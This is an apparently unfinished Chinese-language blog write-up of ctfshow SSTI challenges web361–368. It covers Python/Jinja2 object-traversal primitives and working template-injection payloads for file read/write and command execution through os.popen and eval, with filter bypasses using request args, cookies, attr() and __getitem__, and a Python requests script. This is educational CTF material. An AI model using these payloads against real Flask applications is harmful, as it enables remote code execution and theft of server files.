ctfshow-SSTI(未更完)

SSTI 面板注入!
先补充一波基本知识!

//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )

SSTI神器–Tplmap!

基础!

__base__ //对象的一个基类,一般情况下是object,有时不是,这时需要使用下一个方法

__mro__ //同样可以获取对象的基类,只是这时会显示出整个继承链的关系,是一个列表,object在最底层故在列表中的最后,通过__mro__[-1]可以获取到

__base__    //类型对象的直接基类

__bases__   //类型对象的全部基类,以元组形式,类型的实例通常没有属__bases__

__subclasses__() //继承此对象的子类,返回一个列表

__globals__ //返回一个由当前函数可以访问到的变量,方法,模块组成的字典,不包含该函数内声明的局部变量。

__getattribute__()实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。

__builtins__   //返回一个由内建函数函数名组成的列表。

__getitem__(index)  //返回索引为index的值。

url_for  //可以直接和__globals__配合,如:url_for.__globals__['__builtins__'],或者和string等配合,详情看迭代器部分

lipsum  //flask的一个方法,可以直接和__globals__配合,如:lipsum.__globals__['__builtins__'],或者和string等配合,详情看迭代器部分

__init__   //该方法用于将对象实例化,如x.__init__.__globals__['__builtins__']
//{{''.__class__.__mro__[-1].__subclasses__()["type"].__init__.__globals__}}像这种找到了类要查看该类的方法要先__init__再用__globals__,直接用__globals__会报错

config  //查看配置文件

app

__doc__

get_flashed_messages // flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。

__dic__     // 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里

current_app          应用上下文,一个全局变量。

__import__     //动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]

SSTI常用的一些语句

{{5*5}} 直接执行
{% set a="test" %}{{a}}      //设置变量
{% for i in ['t ','e ','s ','t '] %}{{i}}{%endfor%}  //执行循环
{% if 25==5*5 %}{{"success"}}{% endif %}  //条件执行

再来摘抄一些!

__class__            类的一个内置属性,表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类,返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文,一个全局变量。

request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>


web361

ctfshow-SSTI(未更完)
然后我们就可以利用这个了!
ctfshow-SSTI(未更完)

?name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web362

从这道题就开始了过滤了!
ctfshow-SSTI(未更完)
所有我们用这个来进行构造!
ctfshow-SSTI(未更完)

?name={{().__class__.__mro__.__subclasses__.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
或者
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
又去其它大佬博客里吸取了一波天地灵气
{% for i in ''.__class__.__mro__[1].__subclasses__() %}{% if i.__name__=='_wrap_close' %}{% print i.__init__.__globals__['popen']('ls').read() %}{% endif %}{% endfor %}
这个是没有办法弄到flag的(我认为的,本人小菜!)

web363

这里的思路和上一题差不多!但是我们需要进行一定的构造!
经过一番尝试后发现过滤了单双引号!所以这里就要用到了request.args.x1 get传参这个来进行绕过了!
ctfshow-SSTI(未更完)

http://28136609-4732-4c23-8315-73ce3ee36ea9.challenge.ctf.show:8080/?name={{().x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

web364

这里不能使用了get和post进行绕过,所以我们采用了cookie来进行绕过!
ctfshow-SSTI(未更完)

http://19bf20fd-fb45-4d05-8d00-612ebf6e92c9.challenge.ctf.show:8080/?name={{().x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
Cookie: x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

web365

这里中括号是不能使用了,采用的是 __ getitem __ 这种方式进行绕过!
ctfshow-SSTI(未更完)

http://c10f9098-9892-4da6-923d-7289bf23b70f.challenge.ctf.show:8080/?name={{().x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}
Cookie: x1=__builtins__;x2=__import__('ox').popen('cat /flag').read()

还有一种方法,这是看师傅来的一个比较简单的构造!

?name={{url_for.__globals__.os.popen(request.cookies.c).read()}}
Cookie:c=cat /flag

web366

这里直接ban了下划线!有电难了,看师傅!

lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.globals[‘os’].popen(‘ls’).read()}}

ctfshow-SSTI(未更完)

http://0d80ec51-c99e-48bf-9c2a-95183a6b0fab.challenge.ctf.show:8080/?name={{(lipsum|attr(request.cookies.x1)).os.popen(request.cookies.x2).read()}}
Cookie: x1=__globals__;x2=cat /flag

接下来的这个是看大师傅的sao操作的!

?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

这个比较好理解!比第一个要好理解点!


web367

这里是可以使用上面的第二个骚操作的!

?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

这里是ban了os的,我们可以把os进行传参绕过!
ctfshow-SSTI(未更完)

http://891667b0-1429-458a-a356-be9f56ff2fc5.challenge.ctf.show:8080/?a=__globals__&b=os&c=cat /flag&name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}

web368

从这里就比较难了!

import requests
import string
url ='http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%print(aaa.open(request.cookies.x5).read())%}'
headers={'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
r=requests.get(url,headers=headers)
print(r.text)

这里来详细的介绍一下构造的url

首先是个url,这里不用多说
http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/
从这开始先set设置一个变量
?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}
这里在使用我们设置的aaa进行打印
{%print(aaa.open(request.cookies.x5).read())%}
而此时我们需要利用cookie进行传参!
{'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
url这里需要注意一下小括号,根据括号来进行理解!

不过这里一直500,不知道怎么回事!

接下来的难度较大,所以先不再做下去了!

上一篇:2021-07-09


下一篇:想知道「双十一」淘宝商家销售数据?快来看看!!!